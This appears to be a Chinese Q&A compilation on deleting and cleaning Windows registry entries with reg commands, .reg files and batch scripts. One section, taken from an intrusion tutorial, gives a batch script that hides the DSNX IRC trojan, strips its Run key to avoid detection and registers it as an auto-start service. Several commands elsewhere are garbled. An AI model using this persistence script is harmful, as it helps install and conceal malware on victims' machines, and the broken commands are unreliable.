清理注冊表命令

❶ 如何使用注冊表或cmd命令刪除注冊表中的某一項

reg delete keyname [/v valuename | /ve | /va] [ /f]

其中：
/f：表示不提示，強行刪除
/va：表示刪除該項下的所有值

/v：表示該項下要刪除的值的名稱，如果省略，該項下的所有子項和值都會被刪除
/ve：不是很理解，跳過

如果上面後三個參數都省略，則刪除該項下所有。

keyname：含有空格，應用雙引號括住。

❷ 如何利用批處理命令刪除注冊表

如何用批處理文件來操作注冊表

在入侵過程中經常回操作注冊表的特定的鍵值來實現一定的目的，例如:為了達到隱藏後門、木馬程序而刪除Run下殘余的鍵值。或者創建一個服務用以載入後門。當然我們也會修改注冊表來加固系統或者改變系統的某個屬性，這些都需要我們對注冊表操作有一定的了解。下面我們就先學習一下如何使用.REG文件來操作注冊表.(我們可以用批處理來生成一個REG文件)

關於注冊表的操作，常見的是創建、修改、刪除。

1.創建

創建分為兩種，一種是創建子項(Subkey)

我們創建一個文件，內容如下：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]

然後執行該腳本，你就已經在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下創建了一個名字為「hacker」的子項。

另一種是創建一個項目名稱

那這種文件格式就是典型的文件格式，和你從注冊表中導出的文件格式一致，內容如下：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]"Invader"="Ex4rch"

"Door"=C:\\WINNT\\system32\\door.exe

"Autodos"=dword:02

這樣就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下

新建了:Invader、door、about這三個項目

Invader的類型是「String Value」

door的類型是「REG SZ Value」

Autodos的類型是「DWORD Value」
2.修改

修改相對來說比較簡單，只要把你需要修改的項目導出，然後用記事本進行修改，然後導入（regedit /s）即可。

3.刪除

我們首先來說說刪除一個項目名稱，我們創建一個如下的文件：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"Ex4rch"=-

執行該腳本，[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的"Ex4rch"就被刪除了；

我們再看看刪除一個子項，我們創建一個如下的腳本：

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

執行該腳本，[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已經被刪除了。
相信看到這里，.reg文件你基本已經掌握了。那麼現在的目標就是用批處理來創建特定內容的.reg文件了，記得我們前面說道的利用重定向符號可以很容易地創建特定類型的文件。
samlpe1:如上面的那個例子,如想生成如下注冊表文件

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

"Invader"="Ex4rch"

"door"=hex:255

"Autodos"=dword:000000128

只需要這樣：

@echo Windows Registry Editor Version 5.00>>Sample.reg

@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>Sample.reg

@echo "Invader"="Ex4rch">>Sample.reg

@echo "door"=5>>C:\\WINNT\\system32\\door.exe>>Sample.reg

@echo "Autodos"=dword:02>>Sample.reg

samlpe2:

我們現在在使用一些比較老的木馬時,可能會在注冊表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run(Runonce、Runservices、Runexec)]下生成一個鍵值用來實現木馬的自啟動.但是這樣很容易暴露木馬程序的路徑,從而導致木馬被查殺,相對地若是將木馬程序注冊為系統服務則相對安全一些.下面以配置好地IRC木馬DSNX為例(名為windrv32.exe)

@start windrv32.exe

@attrib +h +r windrv32.exe

@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll

@echo "windsnx "=- >>patch.dll

@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\winnt\system32\windrv32.exe

@regedit /s patch.dll

@delete patch.dll

@REM [刪除DSNXDE在注冊表中的啟動項，用sc.exe將之注冊為系統關鍵性服務的同時將其屬性設為隱藏和只讀，並config為自啟動]

❸ 如何刪除注冊表中的命令

在360里好刪，直接在注冊表裡不好找……因為這個模塊可能是某個程序調用的，而這個程序不知道是什麼……

❹ 如何用批處理命令刪除注冊表鍵值

用REG命令就可以做到（需要管理員許可權）

用法

REG delete " manager" /v PendingFileRenameOperations

如下圖

❺ 怎麼用命令行刪除注冊表項

運行 CMD
reg add 增加
reg delete 刪除

可以 你打 reg /? 來查詢用法

也可以打 reg add /? 來查詢分項目用法

------------
舉例：

假如我要清除WinRAR的歷史記錄，可以新建個批處理文件（一行一行敲命令也行），
然後在裡面加入如下文字:
reg delete HKEY_CURRENT_USER\Software\WinRAR\DialogEditHistory\ExtrPath /va /f
reg delete HKEY_CURRENT_USER\Software\WinRAR\DialogEditHistory\ArcName /va /f
reg delete HKEY_CURRENT_USER\Software\WinRAR\ArcHistory /va /f

其中/va參數是指刪除該分支下的所有鍵值,/f參數是指不要跳出提示。
-------------------------------------------------------------------------------------
如果想刪除整個分支，就不要加/va，
例如：reg delete HKEY_CURRENT_USER\Software\CrocWare
-------------------------------------------------------------------------------------
如果想刪除某個鍵值，就用 reg delete (分支) /v (鍵值)
例如:
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\TrayNotify /v PastIconsStream /f
-------------------------------------------------------------------------------------
要注意：
如果注冊表中有空格，應用雙引號括住注冊表；
如果注冊表中有%，就用%%來表示；
例如：要清除Alcohol 120%的歷史記錄，可以在批處理中加入如下命令：

reg delete "HKEY_CURRENT_USER\Software\Alcohol Soft\Alcohol 120%%\Basic" /v "Image File Path" /f
reg delete "HKEY_CURRENT_USER\Software\Alcohol Soft\Alcohol 120%%\MountedMRU" /f

❻ 如何清理注冊表 注冊表清理的三種方式

清理注冊表刪除多餘的DLL等文件
對共享軟體感興趣的朋友可能都知道著名的DLL文件清理工具CleanSweep。它的作用，就是將我們長期在系統中添加、刪除程序時，在System目錄下留下來的大量無用的DLL文件刪除，從而提高系統的工作效率，減少硬碟空間的損失。通過注冊表，我們也能發現一些無用的DLL文件信息或是VxD文件信息等並將其刪除，從而提高系統的運行效率：在注冊表中依次打開「HKEY－LOCAL－MACHINE\Software\Microsoft\Windows\CurrentVersion\ShareDLLs」，此子鍵下包含的項目即是應用程序安裝完畢後向注冊表中寫入的DLL文件共享信息，每個DLL文件的鍵值表明了共享此DLL文件的應用程序數目（在卸載這些應用程序時，卸載程序會給出類似「xxx文件被其他文件共享，是否確定刪除」的提示），如果某個DLL文件所對應的數值為0，即表示此DLL文件對系統已沒有用處，我們可以直接將其刪除。對於其他類型的文件，只要其值為0，我們就可以判斷其已沒有用處，應當予以刪除。
此外，在此子鍵下，你可能會發現以前刪除的許多文件包括文件夾（在硬碟上已不存在）下包含的眾多文件，它們的值不一定為0，但你一樣可以完全將其刪除。
重建作清理
我們知道，通過注冊表可以將「添加、刪除程序」中的各種無法刪除的卸載程序信息刪除，那麼你有沒有想過，你在大量增刪各種應用程序和硬體設備驅動程序的同時，不可避免地要向注冊表中寫入數據。時間長了，這些廢棄的數據會越來越多，你的注冊表文件也越來越臃腫，不僅使你的「酒吧」因為負擔越來越重而速度越來越慢，還會經常導致「酒吧」莫名其妙地罷工或提示出錯。
現在，我們就動手來將這些無用的信息刪除，方法是重建注冊表。首先打開注冊表編輯器，在注冊表編輯器中單擊「文件」菜單下的「導出」命令，將現有完整包含各種軟體、硬體資源的注冊表導出並為其命名，如命名為dc1.reg（因為要在DOS下執行重建注冊表工作，因此最好不要起中文名稱）。
然後重新啟動計算機進入DOS狀態（不能用Windows 98 中的DOS模式，重建注冊表時Windows 98 不能運行），然後執行下述命令；
regedit/c dc1.reg（c與文件名之間應留一空格）
regedit/c表示從後面指定的文件中重新生成整個注冊表。完成後再啟動計算機進入Windows 98 ，你會發現重建的注冊表文件比原來小了很多（視Windows 98安裝後安裝和卸載程序的多少而定）。這樣經過「減肥」會使Windows 98的運行效率得到提高。
不過需要注意的是，用這種方法重建注冊表時一定要注意的DOS的版本，一般計算機只安裝了Windows 98的沒什麼問題，如果計算機同時安裝了多個操作系統，進行此項操作最好在DOS 7.0下進行，至少也應在DOS 6.22下進行。Windows 98重建注冊表需要很長的時間，以本人計算機為例，賽揚300A，升技BH6主板，64M PC100內存，昆騰火球7代6.4G硬碟，導出的注冊表大小為5.86M，重建注冊表約耗費了1小時，所以朋友們在進行這項操作前，最好能先載入磁碟高速緩存程序Smartdrv以便加快處理速度，同時在重建注冊表前應先將原有的注冊表進行完整備份，以免發生不必要的問題。
清理注冊表中的軟體信息垃圾
雖然現在絕大多數基於Windows 98 的軟體都自帶了卸載程序或是為Windows 98的「添加/刪除程序」提供了卸載信息，但它們並不自覺地在退出歷史舞台時將自身刪的乾乾凈凈，大多數在卸載時並不會將注冊表中的相關信息文件（這些信息主要是軟體在初始安裝時寫到注冊表中的有關生產商、ID號、用戶名等）刪除，導致注冊表越來越龐大，無用的軟體信息垃圾越來越多。我們可以在注冊表中用手工方式刪除這些無用的信息：
在注冊表中依次打開「HEKY－CURRENT－USER\software」，它的下麵包含的主鍵一般以軟體生產商命名，如微軟體出品的一系列軟體都包含在「Microsoft」主鍵項中。如果確信某些軟體已被刪除，就可以將其鍵值全部刪除

❼ 運行中清理注冊表的命令是什麼

注冊表是連接操作系統、硬體及驅動程序的資料庫，注冊表中的垃圾多了，運行速度也會受到影響。「注冊表清理工具」是一款專門用於清理注冊表中垃圾的軟體。 在菜單中單擊「掃描」按鈕，彈出「注冊表掃描」窗口，勾選需要掃描的項目後單擊「下一步」即開始掃描，掃描完成後，各類有關注冊表的錯誤信息會在列表中顯示，單擊「刪除」即可刪除這些無用的錯誤信息。 提醒： 為保險起見，刪除前可以先單擊「備份」，以防刪除有誤後「還原」之需 。

❽ 清除注冊表的命令是什麼

什麼是注冊表
注冊表是 Windows 中的資料庫，它包含有關計算機上的系統硬體、安裝的程序和設置以及每個用戶帳戶的配置文件的重要信息。Windows 會頻繁地參考注冊表中的信息。
不需要對注冊表進行手動更改， 因為通常情況下程序和應用程序會自動進行所有必要的更改。對計算機的注冊表更改不正確可能 會使您的計算機無法操作。但是，如果損壞的文件出現在注冊表中，則可能需要您進行更改。
強烈建議您在進行任何更改之前備份注冊表，並且只能更改注冊表中您理解的值或者由您信任的提供者指導進行更改。

注冊表怎麼打開
1、最簡單的方法，依次打開：「開始」菜單--運行(或者快捷鍵win + R)-在運行中輸入「regedit」再按確定就可以了(不包括雙引號)。
2、另外一種方法：在Windows目錄下找到regedit.exe，直接雙擊打開(我們默認C盤為系統盤，依次打開C盤-Windows-regedit.exe)

注冊表命令
1. Nslookup-------IP地址偵測器
2. explorer-------打開資源管理器
3. logoff---------注銷命令
4. rononce -p ----15秒關機
5. tsshutdn-------60秒倒計時關機命令

注冊表清理 刪除多餘的DLL文件：
DLL文件即動態數據鏈接庫，在安裝和卸載軟體時，在C:WINDOWSSYSTEM32目錄下會留有一些DLL垃圾文件，這些文件會佔用很多磁碟空間，從而降低系統運行速度。那麼我們怎麼判斷它是有用的DLL文件還是垃圾呢?刪除垃圾DLL文件方法如下：
打開注冊表編輯器。
展開HKEY_LOCAL_子鍵;
該子鍵下的項目即是應用程序安裝完畢後向注冊表中添加的共享DLL信息，每個DLL文件的鍵值都表明了共享該DLL文件的應用程序數目(即圖中最右側括弧中的那個數字)。在卸載這些應用程序時，就會彈出提示框「XX文件被其他文件共享，是否確定刪除」。這里，如果某個DLL文件對應的數值為0，即表示已經沒有程序應用這個DLL文件了，這就是垃圾DLL文件了，直接將它刪除即可

清理注冊表垃圾的cmd命令是什麼
1:在桌面上點右鍵.
2:新建文本文檔.
3:把以下代碼復制進去
@echo off
echo 正在清除系統垃圾文件，請稍等......
del /f /s /q %systemdrive%*.tmp
del /f /s /q %systemdrive%*._mp
del /f /s /q %systemdrive%*.log
del /f /s /q %systemdrive%*.gid
del /f /s /q %systemdrive%*.chk
del /f /s /q %systemdrive%*.old
del /f /s /q %systemdrive% ecycled*.*
del /f /s /q %windir%*.bak
del /f /s /q %windir%prefetch*.*
del /s /q /q %windir% emp*.*
del /f /q %userprofile%cookies*.*
del /f /q %userprofile% ecent*.*
del /f /s /q "%userprofile%Local SettingsTemporary Internet Files*.*"
del /f /s /q "%userprofile%Local SettingsTemp*.*"
del /f /s /q "%userprofile% ecent*.*"
echo 清除系統LJ完成！
4：輸入另存為 取名為 1.bat
5: 雙擊運行1.bat

清除注冊表垃圾的其他兩種方法
1、使用第三方安全軟體清理注冊表垃圾
利用超級兔子、優化大師、安全衛士一系列的第三方軟體清理，下面小編就以金山衛士為例，打開主界面，找到垃圾清理-清理注冊表，開始掃描清理即可，金山衛士會自動把注冊表備份，就不用我們在單獨備份了，要是出了問題也容易恢復。
2、利用自帶的注冊表編輯其清理
我們首先使用window鍵+R鍵調出運行框，然後輸入regedit回車，打開注冊表編輯器，然後我們就可以把那些不需要的注冊表手動清理出門了！這個需要對電腦需要一定的了解，誤刪注冊表可能導致各種系統問題，小白朋友要慎用哦。

❾ 如何用CMD命令 清理注冊表

使用小工具清理吧。簡單快捷，又可以備份已刪除的注冊表信息。
免費的注冊表整理工具Registry Defrag 2010不錯。
http://www.x-berry.com/registry-defrag-2010